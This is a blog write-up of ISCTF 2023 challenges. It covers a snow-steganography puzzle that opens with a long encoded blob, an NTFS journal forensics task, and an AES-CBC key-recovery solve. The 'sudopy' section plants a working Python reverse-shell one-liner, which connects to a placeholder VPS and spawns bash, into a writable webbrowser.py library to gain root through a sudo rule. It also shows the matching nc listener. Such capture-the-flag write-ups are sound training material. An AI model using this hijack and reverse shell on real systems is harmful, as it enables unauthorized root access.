MICGSmCIM35yCSC3aSJZcG9FSm0DSTCadGNIOITNSnBSIICaYSTIInZSb3CaYCJISIpIInNjbGZTCEdoFT2GICIXa2CCSCICeSJYaIZ0Mm0CSmTxF2CGSnIIaCTqCICIISTZI390S35GFFpOSFJFZXdCSEExFjI3IIIGaGTSZXBQSm2TYSMyCnNSbG0IFjBac2TZIndXSTJCSmpCIIJZbDNCMIp2SjIaNTCZaIdNa3CMSIpGaFZ0Z3dXaCSCYmC3NSYxF3COZTS5SIC3SGJZNS0CbGQTSTCadGSSImxIb0B6SjSxMIZIIXdNSIJXCSdoeTCFI3CjbF5SC2CIS2JYQjJIbXB0ISdOc2dFFTNSIEJYII2TI2dIInICa3JOFm2IIIYxaGC0bEpYYFCoSSC6SnCCMn00STC3dIJIaId0MI94Smp3NGEyZTdXa2pFS3S3IISqCTNjbIpYCSC3ST2IIjIIbX0XYSCJeIIGcIdIMTJSSXp3ImSGC0N0ZCSYFTS3FICCMCZ3MIZ0SF5IC2CXFTdFS2ZXCmxaIGSGCTdIb0B6ICBIb2CXZX0jZTC0Sm2IFIZCeGIjMXB0I3F2SIJScECIa3CCFCISeINYaI0SaCSCSjBoQ2YxbI0je3CYFm24ISpIaGCIS3pCYT0IST2FFXdIa3C0YFx3dINGcE5IMFoyS2CISmQyFX0Fb35CY3dIC2TCMI9SMST4SF2GSIJII30CMICZYFC3c35XOSSIMF0MSjBaa2d0F303ZFxOSm5CISCCMDIFMST5FF5ISmJ0eI0CbG0SCIxIcTdCdGpSZTp5S3cxb2FxI3CXbGxXYTZGM2CFZTp3MDICFmx3aSJScITIZTCZSCIIZFECbGpTa2pYSIdTd2NGa2dXbXZICSCIIIYyeGIIM3pSFTZCIICIcGIaSTpXYFx3c39ICGTCZFpYSjI3MGEyIX0XaFZpFTSIaISZSCIFMSpTCSCObGJGcDBaSIZ0STFxSFJECTdNbTJ6SmTxI2dIZnZ0ZmZXFT0CCSCFQmCIMF50FF5OSFJ0FT0CbXZTSGxac2pEQTpIMIYTSjIob2TIC3CjIEpIYTZGSICEZnNXST50I3CICTCFQTdISEp2SCJGZ32ICId0aCSISmx3bFSIbICXa2ZXSmCIeTTSImC0STpyFFCoS2JIIm0Ce3C0SjIIdSNIQTdSS3pQSmTIMSICS3dXb3paCCJoSIZIITdOSTS5CFdTS2SIcDISS20CSjJ3IIIIeICNZnB0ITCSeIYxcE0jZCSXCSSIaIYxITd0MFT4SFC3SId0aISCa2p0STCIdGSSCGpSZnBISSCob2FIMS0Sa3CXSnpId2CFQXdTZ35TYFC3aSCIICJIZTp0FF2IIIJYcGIIbI0IIS0IS2dICI0TZmZZCSF2IITZImIIM3pGCTCoSSYCFT0Fa2pyCDIIZTpGcId0MTJSSmp3d2QxInJNSIZXS3SaIITXd0dCZTCxFm53SISIcE0XaFZSSGIxZmN0OSdSSESTI3ZGCmQIMSCaZmZYFjJoSSCqQmCSM3C0ST03S2CIITTIbCETCFCZemNICI0Ib0AIITSaYSCZMXIZSECXCI5oaIpICIdIMIZCSF2IIIJZIXpIMSpXISCNeSZYbIS0MTJCIICad2Qxb0ZTZIZOCSCIeISXMFdXbIT2CSZIIGEyaE0ISEpTFjJOISIICE5IMFoySmpGYSTXF30Fa2pZFmx3C2CqZ3CCbIpYCSZCITCIbDSSMnZSSm23IGIGCIp0MXBoSIZGcFNIInZ3ZmZOSmxINSdZSmIIMSJTFmpaF2CIIT0FSCSCCGxaZSJIcGxIaCS5SjJCNSdGITCjZm0YSjNodTTqQXdTZT5GSmxOaSCIcIpIS2B0ISCOS2SYaI00M2JIIICacT5IbICXb35XCICaeSTFcENXbIpGSF5ISFIZITBCMn0ZYCIIdGI0eGTXZF0aSmpGaT50IXTCIGxXYmI2S2TCcCIXSmxySF53a32Ic00SbCI0S3d3ZFNIbISIbFTxSm2CeGNICISCbGZpSTC3NTCqQmICS3pCSG5ISGJSQm9CSEC2YjI3cTCCZTZNS2JCSI2TaFIGIXTTZm0SSnpGdTYxITpTS2CSCEF2FFJYaI0IZTCSYjI3IINFCTZSaCSXISdCMSCGa20XbE5XCICaZ2C0eINSM3pCYFCoSFIZbDZFSSp0STCOcTdCcINISnBYSm2IC2FIM00Xb3CFYCNIISCqQmICbIS5CFC3aIJFZnpSMnQTSTd3Z2dCaI0Ib0BySmp3C2JIC0JPSmZpSjJoSTYxITNFMFS2CS0OIGJZNSdCSEExISCacSJZCE9IbSJ5SmTxMGIGInJOSIZaCFCIeTYyeGIIaCSXSIx3aE2YQTTXa2CZSjIOSFNII39IaCSISjB3CT5IInZ3Z2BZCFZIIIdZSmCIZTpyYT0GS320FCBIbX0CYFx3dSpINF5IbXcxSFxIa2SxIXdNIEpPST0CS2ZXNI9NMSpxFFCTST2SNXTCSSpSYSC3cFNSbId0MFpSSCSxS2NGFnJXbFCCCI2oSSdXeGICMTI4SFxobIJ6bINFSTC2STCCeF5SdI0IM0BXSjSINSCIInNjZI0SYCIIYSpSCEdCZCTXI3F2aETIICIIaFQTYCJJeIdFFTNSa2BSIIx3b2dGbISIbmZYFm5CZ2dZI39IZTp2FICoITCIc0JCSTp0YF2OIIJICE5SbEpCS2CIZ2NCS3djZIxSY3docISCe0dISmZXSICTaF2XF30IMjSXYIx3dISICICSSECFSjBaImSXF3SZbIpOYCNCIIC0eG93MIZTFT0oaTSyaGIIbX02YFxIcSJZOS0IMDSSISS3c2FIMSCIa35XCSC3I2pSITd3ZTpCI3CIaIECQndIS2BDISCaZFJSCmIIemxyIIC3FFSIC0JSaT5YY3CIeSZIIm9IMDIxSmCoSFExcG0SbX0ZCEC3c2p0bI0IMmcySmC3NITIIXTSa2pPSmxIcTSCe0dFMIxSFm53CFJGcICSMI0SSCAxSFNGaIdNaTCQISd4I2JZNSd0ZTppFm5BeTdIImI3MST4SFxIaIJCFnBSMICTF2CacTpScE5IMIpJSmT2C2d0ZXpZbG0aSjNIMTpEZmCIMIZCFF24FFJIImIXSTC0YjJGIINZImpCZ20YSmpOF2YxFTdXbXZCCICIITC0eGI0ZCIISmxCS2JIc0CSSECaCFCIISNIaGTXZ3pFS2d4S2dZMXNIbTJIFnpIISSqQTdOZmC2YFdGIGJGcDBIS2QTSm23SSJIQTC0a2poIXp3Z2SxcE0SZ35YFTSIFICCM00OZTS4SI0oSId0aISIMGZSS2CIdGS0ZTdSZ205SjS2aFIIInNXbm0IYT0Zd2YICECIM350Y3CISFJIcISIbXZICFC3Z2CFCm0IbSJYSIZ3bFSIInICIG0XCII2eTdZaE9XZTpJFI5CSmJYaDJaS200STCGdIJCcE50eTYFSmTIMSQxIT0CaF0IYXpIS2TFZmICSnBISF2TST2IcDBSbX0TSGxadGZ6QTd0aF92S2CaSmSIInSFbIJpFjJoaICCcE9SM3C0SFCaIGJZc0NSbCICCIx3cTpSCISSZ2J0SCJTc2YyZXTSaTpSSmxISIT6ZmCjM3p0FFx3F2CFQTpIMIQTSCIIdT5SCGpISTpFIS0ISFMxSnZTZXZYY3d4eSYyeGC0ZTT2SmpaSTYCaE0Ia3pTSTCGcSSIcG00MXBCSm2IZFEyFTdIbTJIFmx3SIZISndOZTpCICNoC2SIMCNFSI0SISCOZmN0ZmIIMF0oIIpGYIMxSnJaZm0CYT0ZeTdISmpOSTT5FFC3aISZcIdCbG0CCGxacSNZdI0IbEp4STd4aFI0ZXpZbECXSjNCCISqZ3pTZnBJFFI5ST2Ca0dISCAxFCIZeIdFZTNSSSpSSISIS2NGI30OS35XCICIeTFyeINXbIpGYnpCS2CIInpCMn0ZCICIIGNGCmTCZF3xSm2IImSGIX0IIG0FYmx3S2TCMCZXZTpxSGxOamJGbDSaSIZ0YI23SmNIITdIMF0FISSSeGZ0Z3dIbGZpSTdoeSCYcEdCbSCXSI53IGJIIT0CbIpTCDIadGZGCIdNZIC6SFCoC2TII3dCbFCXYT0IeTZZImCjbFC0SGxaCmECQTpXbICICTCCeSNISTd0MDSoSICIYIIGIXdaZmZFFTZIIS3ISCI0ZCB2FFCISFJGI3CFSTpICSC3cTpGFmTSZXBYS2d4S2TICEdSZm0qCICaSTZIaENIMST5CSS3aGJScETIS2B0SjIJemISITpIb0BTITSaC2dIcEdaZmZIYCIIM2YxITNCMFT4S20oSIJ0eG9SbX0TS2CIcSJZdI0Ib0AISGxoa2SZMFSIaF0XSjNoaIYICECIM35JSGx3aSdIMCZXbIp0YCJOcFNIbGIIb0BPSmxoQmSGITdaZIJZCSCINSFyeIdSMSpGFFxISFJFZTZSMIpXY2COc39ICmTIb3SFSmxjeGSxFnZCa2pqFmxIIIZIInd3b0BIFmCIbIJFQ3pIZ20SYSCJeIIGQTdSSIYCIXpGImSGSnNaZm0pYTC3eTdXdGCNZCB4S20IC2CFbI0FSSJ0STCIdINIdIdNa2BaSSd4Q2YyITSIa20XCSCISI3xITdjMIZTYFdoC32IcE9IbX0ZCDIJeGJGaISXZF0XII24IFNGSnZNS35YFm24MIpISjBXbIpCYTZCYSJXF30IMn00YCJ3ZSCICIdSSF05SmC3NITXF3dIb35pFm5Cb2ZXeECNbIpySIC3ITYINXpIMjSTYCI3dISZOSdSIISCSjJ4aFNIInZIbXZOSmCSd2CFIjB0M3CCFFCaSGJXaI0Ca2p2YFCaSTdCZmpIa2paISS3dFIIITSIaFxYS3S3aIdIITp3MDIJY3doF2CIcITXSmQIYCA2Z2CFZTZ0emxxSICoQ2NIInZTZ35oSmCINIFyNIIXZTpCFFCoYSJIcI0Ia3C2F2COcFI0bIdIb3JXSmCaaFSCS3COSIZYYmx3FICCcCISMSCTCE0OC2CFQTdIMn0PSjAxZSJZaIdNbTI2S2CaYIMyC300ZTCCSjI3SSCFQmICMTJSFmCaC2CZNSZIbCSDFCIacSJCdE5IbX0CSCIob2dGCE0TZTCaYT0IM2CSImI3ZCIYC2CoFFJIcI0IMnZ0SDJIeSNZaGxCZF0XIIxobFIGbISZIG0XCII2IIYyeGI0STpGSFpaSFEyFCBXSmZOCSCOIIN0ZTNSSF0FS3CaYIQIMXNXb3pIYCJIS2TIImICZmZyYFC3SFJScIpCSSpCSF23ZFNIeIdNSnBoSIpGd2NIcEdFbIxXYCIZd2CCcEdSM3S4Y3C3SGJ0eIdCaFZSISCIcTdIImxIbIp4SIT2CFICI30Sa3CYYCIIcTC0eGI3Z2SFFmxoSFJGc00IZ200SF2IS2ZFCmTIMm0FSIcxb2dIInZNSIJZCSC3IITZFmISM3pTSIxISFJYaG0aS200FTFxISZICE5Ib3I4STC3NITIIXTCaF0IS3S3ISCCMSNSMXBXSF2Ga32YQ3TSbX0CSCI3ZTNCZTdNS2EISmpGc2YxCIT0ZTppFjJoeIdICDBCST24SF5IbIJXFTBSbX0CCTCISTSICG0Ia2B6ICBoc2dZMF00I0BXY3dICISqI39CST50I3dIS2JIcE5IbGZ2FjJIeSSIaIZ0Mm0FIIC3FFNGSXdIa2ZZY3CINSpIImC0ZCIXFmpIS32qSTZIbCIGCFdOZ2IICGTXZCETSmCIZ2YyF30IaFxSYXpIcISCNFNOSTpxF20oFT2IbDNFSm0TSjJGc2NIaISIbSJFI3d4a2YxC0J3Zm0CCFCIISYydGI3MIZ0SGCaSGIIcI0CS2ZTYFCINTNZOIpNaCS0SFCaSFIIIX0CbICYSjNodTCXc20IMIZ2FmxIaGJIc0CIZmQIISdIS2SICI0SaCSXIIxIST5IcICXbFCXSmxIeT3IF39CS3T6YFdoSFJGcIBCMjICFjIIc35XaGxSZnBJSmTxNGEINF0IIGxCYCIIC2YISndSZTS2YFSOIIJIIn0IZCA2YI23Z2dFaICNbm0QSTZBeIYxCnIIbIpOYICaMTCIF3J3MTC0SG5IaTJCaI0Ca2C2SSCaS2SZCG0NSIITICBIaFIGIXp0ZTJ0SnpIMIpEZmIIMXBIFIxISFI6S3TXS2ZSFCJGZ2NIbICSZ20XISdTI2dGFnZTZTCYFTZIS2pIImCFbFS6FI2GSFJ0CjZCa3CCSjI3dSZCcIZIIEJoS3CjMISyCnNjZSp0FmI2SIZIIndNZmxySF2TIIJZcIdIMI02SjJGcTdCaId0a2p6SmpGC2dXZ3d0Zm0CCCJoSTYxY20NZ2I4SFx3aSNINI0SbnBCSTCIS2dZdI0IbXQCSmTxMIdGInJjI0BXCIpIdTCCMFCXSTC0FIxIS2JIcG9XI0B0SDJOS2JFCmpIMm0PSjBII2SIIX0XbFCaSm2IMICCeG9SM3S5SI5GSmJFZTZCa3CCSjJGZTZICIdSIEJ0S2ZCST2GI30CbGZYYCJoISTFIm9SZmZXSFCTa2SII3pSS200YFdIeTIqITdSZTpoS2C3C2YxInSSbEJXYCNCFIdIa0dIaCI0SF5ICTJIITdFS2ZXC3CaIGZ0ZTSNSnB5SCJ4b2dCI300IIpXCFCISIT6ZmC3SnB0SG2ISIJScE0IbIpqCFdJeICYbINXIEJCISd4YSdIInIFbE5XFm2IIIYyMFd0aCIYSIxII32GcI0Ia3CTSjJOZFJGaIdNMFpSSFCII2SxIX0IbTCIYT0oSIYII3CTSTpTCF0oS32IInpXaF0TSjIaZTdCOSd0aToCSjIac2CCZ30IbGZOYCNCYSCICDBSMST5FFxIFFJ0aIdCS2Z0YFxINTJFCINNIEJJIIC3bFJ0I3dSe3JXYT0ocSpEITdIMSpCY3CIaE2IITpXSCETFCJOc2CYCI0SbSJISIC3NGSIIXTOSCTSCSSIMICXNXNIMST6SIxCITCIcG0IbIpTYCIIZ2CICGTIIEJISm2IQFExInZIaFZ0FTCaISTZCINSMSJYCFSTSIJCFnpIMjEISCAxSmJEFTpNZTpyISd4ImSXZ3CPSnBoCSCIISCGF3dCS2JGCSCIYSJZNF9CI0BGCSCacTdCOIpNSTY2SIxoc2CCI3djZTCaYCJIdTp0e0J3MIZCI3dTFT2ScECIMnZICTdGS2NFSTJ0bEpYSmCIYSCGSnIIbFCXYXpGIIdZC0NSMFpCYTCoS2JCCX0Ca3p0FjI3ISp0ZTNIb3J6Sm2IZ2TICTdSZTpYYTSab2CCd0dNSTCXYF03IIJIcEdCbnBDSTCacFNGQTCNZnBoICSxZ2SxFnZSZm0CYCNCS2CCM00NZTS2CTS3SSd0aG0SbCISYFxIcSICZmTNS3pYSjS2C2QxInNIaTC0STdZd2CqZ3C3ZTCyYTCaSTTyaDJIa3T4Fm2IIIZZImxIb0BPSIT2QFIGC0NXbIpIFmxINI3ISmCISTYFSmxISmJGIjNIZSp0YCIIcmZIOSNNZ2cxSTcxNGExI3daZI0IFnpIS2ZSCINIZTT4SF2Ga2SxI3daZSp0SCJ3ZFNGCIdIe3STSISaImQIMSdSZ3poCI2oITdIF3CSMF50SFxIFFECFT0CbIFxFFxIcTdCdICNa2B3SScINSYxCETZaF0XF3SaI2pSIndCSTpCSm2IST2CaICIMn0qCFF2Z2pSCT0SZF0xSIxSMINIFTdISECYFmxINSpSYCSISCIXYTCIS2YCa0CIMjITFjI3dGI0ZTdSIEJoSFxaa2FxITdIb350FjJoc2TFZndCbIT4SICOaE2ZbDZIMI0ZSGxaIGIGCIp0MTJFSmpGcFMyZ3COSCSXY30CNICXM00IM3S4F203aTJXaI0SbnB0CIxISTCYaIZIa2oxSjJ4aFIII3CIIGZXCSCIcTSqITNIMIZ2FF2oFFJIcIpIS2BTYjI3c2dFZTJSIIJQSI24d2dGb0J0ZXZaSmCIIIFyNFNISTpCYTCoSSCIIm0aZSS4SmxIIGIGCm0NME3ySm2II32XCX0XIGxFY3CaIITCd0dXZTJISF53SSJCdCJSbCEIYIxacTdFcIpNZTS4S3dCeIJCC3CjZmZpS3SCeTCYcEdFbSC0I30ISIJSITSSbG0DCGxaIE2SaGTNaFITSTd4bFJGITTSbEJaYCJISIYIImI3ZCISFIx3CTJIIjSIZTpCSCI3IIJYbG0IbEpYSmCId2ZGSXdXbGZqYXpIIIdZCG90ZCI0S20ISFExcI0XSTpCSjIIcmIGIm0NbI0SS2dTYSTXC3dXbTJIFTdISSCCe0dNZTJXSIxOaGI6ZnTIMnZSSmIxcSCIFTpISnBQSI24CFZGInNaZCSCCI2oZTCCcENCST25SGx3SGJIITZCaFZSS3CacTCCZTpIbSJISSd4YSZIInNSZICICI5ocTCZCECCZ2C0YFCIaSJZcEZXbIC0ISCaS2ZFImCIaCSPSm2TdT5ICIdIbFCaSjBaISSCcGIIM3pYYFCISFJYaExSMIp2FTCGISp0eINSS3p0S2CIYISyZT0CbGZFY3CaISCqCTN3bICSFmCTa32Ic0pCSIQTSCJIdGSGaIdIbSI2SmpBMIMxInN0Z2BCYTC3ITCXMCZ3MFT4ST0IC2YIImIIbXZ2FjICeF2SCIpIb0B6ICBaQ2dCSnJjZX0IYICaFIpICECIMSJyCTdIST2Ca0CIbCB2CDJZeSCZI39ISF0XSjB3NICGbISCbE5YSmxIM2dZI39XZTpTCF0ISFJGI30IMIpTYCJOZSICZTNIMm05S2dTa2MxC3dIbTCpFm2ob2ZXc2dTZmZXSm2GSE2IcI0SMjSTYFC3dSIIaICSZ3pYITCaYIZ0C3C3ZTJOSTZIISCCMCZIMSCTFFCoaIJCaGICSEpSF3CaSTdCdGpNS2SISI24a2ZCZjCISECXSnpId2TFZmIXZ35CYFdoF2C0eG0XSTJ0ISFIeGNIaGxIMIpxSICoQ2NIC0JXbE5SY3SIIIYyd0NIMDI2SIxoITCIImIaSTpPCICIc2SCbG0TbIpCSmCaSFExSX0XaFZYYmx3c2FISCIjSmxyI3COCTCCFnTIbIJ0SmIxcmNICIpNZnB6SjBaYIMxC0SCbICXSm5CaIdISmIFM324SF5OSIJXeIZFSTC2YjIacTdICIpIaCETSCJTa2d0InJXbICaS3F2SIYxImI3Z2CSFmI2SFJ0dCIXbICZCFdGZ2dFImTIZ3pXSIc2FFZIIXdaZXZCCSdIMSFyeGCSMFpXYTCGSFJYQ30Ia3pCSjIIdSZCaINNbm0CS3CIIFSxC0NXb35aCCJoFISqZ3dOZTS5CTF5IIJCF3TCSIM2SmIxIISIFTd0MXBFSjB3CmSCZ3CPS35pFjNjeIYyeId0MDI0S20ISGJGc0ISMGQTISCISTdFCG0IbGI2SICIYIJGIXdOSIxaSTCIcTC0eEC3S3CxSFxoS2JXdCBIS2B0FCJNeICFSTSSSF0FSIc2b2CII3dXbGZZYXpGeTYyNSNFbE5SSI5OSmJGI30SMIp0YCJGIGZGSmTIb3I2S2CIYIExC0ZCbICXYCI3IIZSIndIZTpxFm53SIJFbITCMGZCSCJ3cTNZdIdNbm0YISZGImSGITTaZCSXY30CFSCqQm9ZMIxXSF5OIGJCFTTSbX02CFCISFI0dG0NZECXSGxod2dCZX0jIEpaSmxICIT6I39CZCTXYFC3aSJYQ3pIbXB3CFCCeINYbIS0MXBISI24IFNGIXdIa2ZXSmxIIICXdDB0SCIYSIxoST2FFnJIMGZTSmx3dSNISTdSZTYTSmpCYSdCSTCOSTpQSm5CIITFC3NCSTpSF2ZGSE2IcI0IMI02Sm23IGIGaISISnACICJ4cmSXS30IbXZCCSSIISYydGIFMSJCFF5OaETyeI0FSTp2STC3S2pIcGxIbSSxSTd4FFIIIXp0IIpXSjNIS2ZIInNIMIZ2SGxoaIJIIn0XS2Z0CDJIZ2CFF39IM2JXSISIZ2dGSXTOIGZXCSSSMTSCNIIXbFS5SIC3YSCXFTBSa3pTFjIIZ35ICE5ISmIFSmpGYSFxCX0FbTJXYCJIISTZCDZ0ZTCCSIx3S2CIIn0SMjA2SjJ3IISIbGIISnBySmCSeIdGSnJ0ZnBoCI2oFSdISmICMDSTFFCIFFJSQm9FSm0DSICadE2FFTdNSmI2SI2Tb2SGInNjZCTIYCIaaIYyeGIjMXBJI3COCTCFQjSIZTpSSjJGZ2ZZCGpIMIpYIIxobTTxbICXbIpZCS0CIIdZITNIMDI0YTSIST2FFm0IZEp0SjIIcTdIFmTSIEJCS3CjMSFxI3dIb3CFYCIIc2SCMSNXbGxISFT5aICZbDCCSI0ZSjICemIGFTpTa2pySIpGaFZICnZIbE5CYCNCYSCCM00OZ2I4I3C3aETyFT0CI0BCYjIISTSZCIdNS3p6SmTINSd0I3djZIZSY3doCIYIImIjM35GCFC3CTJFQTTXI0BTFjIJeIdFCmIISICPSmxoQ2TIInZ3Z2ZOFm24IIdZaINIM3pSYFCaITCIIjNISTp0CEFxS2ZIS35IMF0XSTcxNGQxFnNCbTJIY3CIS2CFcEC3MSpSFS0oIISxI30CSSpZSG23dGISbI0IbSEIS3ZGIFZGFnJ0ZF0CY30Cd2CqQmCSbSCCSF5Ia2SIInJFSTC2CIxZd2CCZTCIb0B6SCJ4F2CIIT00ZSJICSCIaI3ye0dCST5GCTC3aSSCY2dIbXB0YjJZeIpSI35CZ20XIIC3b2TIb0JXa2ZFFmx3STSCeGCFM3pGSFxIITCIcIZISEpGCIxGdIJIaIdNMFpSSjIaYIExIX0FbGxpFjJoSITIaG9XSmZXI3ZCSE2ZNXpISCSTSTd3STdIaISIM2SCSCBaYIZ0S3dFbI0XY30CITdISm9SMIZ0S20ISmJXaIdaS2Z0YFCINTJCdGpSSSpJI3SaC2YxIXp0ZTCXY3dONIZSCIJTSTp2SGx3IISCa0pISEJICSC3Z2dFZTJSbSJSSITxMETxIXT3ZCTYFjBIIITZFmIXbIpYSI5aST2qZT0CMn0ZYCIGd

解不开了,看看字频分析

可能是空白格或者snow隐写

发现是snow隐写,密匙是ISCTFZ023

图中命令少个-C

1
.\snow.exe -p ISCTFZ023 -C flag.txt > 1.txt

得到flag

sudopy

提权题,打Python库劫持提权,详细可以看:Linux权限提升:Python库劫持 

1
ssh -p 21943 ctf@43.249.195.138
1
sudo -l
1
2
3
4
5
6
Matching Defaults entries for ctf on b1fe2568a8c6:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User ctf may run the following commands on b1fe2568a8c6:
    (ALL) NOPASSWD: /usr/bin/python3 /home/ctf/web.py

ls,当前目录下就flag web.py

flag文件毫无疑问是没有可读权限的

1
2
-rwx-w---- 1 root root  44 Nov 29 14:25 flag
-rw-r--r-- 1 root root 280 Nov 27 11:09 web.py

web.py内容

1
2
3
4
5
6
7
8
9
10
11
12
import webbrowser

def open_website(url):
    try:
        webbrowser.open(url)
        print(f"Opening {url} in your default web browser...")
    except Exception as e:
        print(f"An error occurred: {e}")

website_url = "https://www.genshin.com"

open_website(website_url)

可以通过劫持webbrowser来反弹shell到vps,得到root权限

/usr/lib/python3.10/找到webbrowser.py

1
2
ls -l /usr/lib/python3.10/webbrowser.py
-rwxr-xr-x 1 ctf ctf 24245 Jun 11 05:26 /usr/lib/python3.10/webbrowser.py

毫无疑问,考点就是这个python库劫持

1
vim /usr/lib/python3.10/webbrowser.py

写入

1
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("vps-ip",7777));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);

图中有个socket写错了

vps执行

1
nc -lvvp 7777

执行web.py

1
sudo /usr/bin/python3 /home/ctf/web.py

vps成功得到root的shell

DISK

算是类似NTFS取证吧,一些参考:通过NTFS日志分析文件的时间属性是否被篡改

解压下来是DISK.vhd文件

win+R,输入diskmgmt.msc,打开磁盘管理,操作->附件Vhd

查看磁盘内文件

那些文件名字符串反转后base64拼起来是假flag

x-way打开,导出恢复$Extend\$UsnJrnl\$J$LogFile

NTFS Log Tracker将日志文件解析并生成一个数据库

发现对文件进行过改名

将未改名前的文件名提取出来

1
2
3
4
5
6
7
1230193492
1182487903
1918846768
811884366
1413895007
1298230881
1734701693

10进制转16进制 然后16转字符

得到最终flag

Crypto

EasyAES

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
from secret import flag,key
from Crypto.Util.number import *
from Crypto.Cipher import AES
import os

assert(len(flag)==39)
assert(len(key)==16)

def padding(msg):
    tmp = 16 - len(msg)%16
    pad = hex(tmp)[2:].zfill(2)
    return bytes.fromhex(pad*tmp)+msg

def encrypt(message,key,iv):
    aes = AES.new(key,AES.MODE_CBC,iv=iv)
    enc = aes.encrypt(message)
    return enc

iv = os.urandom(16)
message = padding(flag)
hint = bytes_to_long(key)^bytes_to_long(message[:16])
enc = encrypt(message,key,iv)

print(enc)
print(hex(hint))

"""
b'bsF\xb6m\xcf\x94\x9fg1\xfaxG\xd4\xa3\x04\xfb\x9c\xac\xed\xbe\xc4\xc0\xb5\x899|u\xbf9e\xe0\xa6\xdb5\xa8x\x84\x95(\xc6\x18\xfe\x07\x88\x02\xe1v'
0x47405a4847405a48470000021a0f2870
"""

测试一下填充

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
# from secret import flag,key
from Crypto.Util.number import *
from Crypto.Cipher import AES
import os
flag = b'ISCTF{aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa}'
assert(len(flag)==39)
# assert(len(key)==16)

def padding(msg):
    tmp = 16 - len(msg)%16
    pad = hex(tmp)[2:].zfill(2)
    return bytes.fromhex(pad*tmp)+msg
"""
def encrypt(message,key,iv):
    aes = AES.new(key,AES.MODE_CBC,iv=iv)
    enc = aes.encrypt(message)
    return enc
    
"""

# iv = os.urandom(16)
message = padding(flag)
print(message)

1
\t\t\t\t\t\t\t\t\tISCTF{aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa}

已知15位可以和hint异或泄露出key的前15位

1
2
from Crypto.Util.number import *
long_to_bytes(0x09090909090909090949534354467b ^0x47405a4847405a48470000021a0f28)

得到前15位密匙NISANISANISANIS

enc的值转为hex为

1
627346b66dcf949f6731fa7847d4a304fb9cacedbec4c0b589397c75bf3965e0a6db35a878849528c618fe078802e176

再爆破最后一位密匙

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
from Crypto.Cipher import AES
from gmpy2 import *
from Crypto.Util.number import *

ct = bytes.fromhex('627346b66dcf949f6731fa7847d4a304fb9cacedbec4c0b589397c75bf3965e0a6db35a878849528c618fe078802e176')
kk = "NISANISANISANIS"

chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'

ct = [ct[i:i+16] for i in range(0, len(ct), 16)]

for i in chars:
    key = (kk + i).encode()
    print(key)
    for j in range(len(ct)-1,0,-1):
        c = AES.new(key, AES.MODE_ECB)
        ec = bytes_to_long(c.decrypt(ct[j])) ^ bytes_to_long(ct[j-1])
        print(long_to_bytes(ec))

正确的密匙为NISANISANISANISA

以及部分flag

1
b106cea3fb848e7bea310c9851f15c1}

在拿正确的16为密匙异或出flag前面的部分

所以最后flag是

1
ISCTF{1b106cea3fb848e7bea310c9851f15c1}
CTF writeup
#CTF
ISCTF 2023 WriteUp
https://www.smal1.black/ISCTF WriteUp.html
作者
Small Black
发布于
2023年11月29日
许可协议